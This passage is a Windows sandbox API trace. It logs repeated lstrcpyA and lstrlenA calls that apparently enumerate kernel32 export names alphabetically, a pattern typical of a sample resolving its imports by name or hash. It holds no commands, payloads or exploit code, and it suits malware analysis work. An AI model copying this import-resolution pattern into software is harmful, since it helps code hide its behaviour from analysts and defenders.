lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.847] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.847] lstrlenA (lpString="BEEP") returned 4 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.847] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.847] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.847] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.847] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.847] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.847] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.847] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.848] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.848] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.848] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.848] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.848] lstrlenA (lpString="CANCELIO") returned 8 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.848] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.848] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.848] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.848] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.848] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.848] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.848] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.848] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.848] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.848] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.848] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.848] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.848] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.849] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.849] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.849] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.849] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.849] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.849] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.849] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.849] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.849] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.849] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.849] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.849] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.849] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.850] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.850] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.850] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.850] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.850] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.850] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.850] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.850] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.850] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.850] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.850] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.850] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.850] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.850] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.850] lstrlenA (lpString="COPYFILEA") returned 9 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.850] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.850] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.850] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.850] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.851] lstrlenA (lpString="COPYFILEW") returned 9 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.851] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.851] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.851] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.851] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.851] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.851] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.851] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.851] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.851] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.851] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.851] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.851] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.851] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.851] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.851] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.851] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.851] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.852] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.852] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.852] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.852] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.852] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.852] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.852] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.852] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.852] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.852] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.852] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.852] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.852] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.852] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.852] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.852] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.852] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.852] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.853] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.853] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.853] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.853] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.853] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.853] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.853] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.853] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.853] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.853] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.853] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.853] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.853] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.853] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.853] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.853] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.853] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.853] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.853] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.854] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.854] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.854] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.854] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.854] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.854] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.854] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.854] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.854] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" 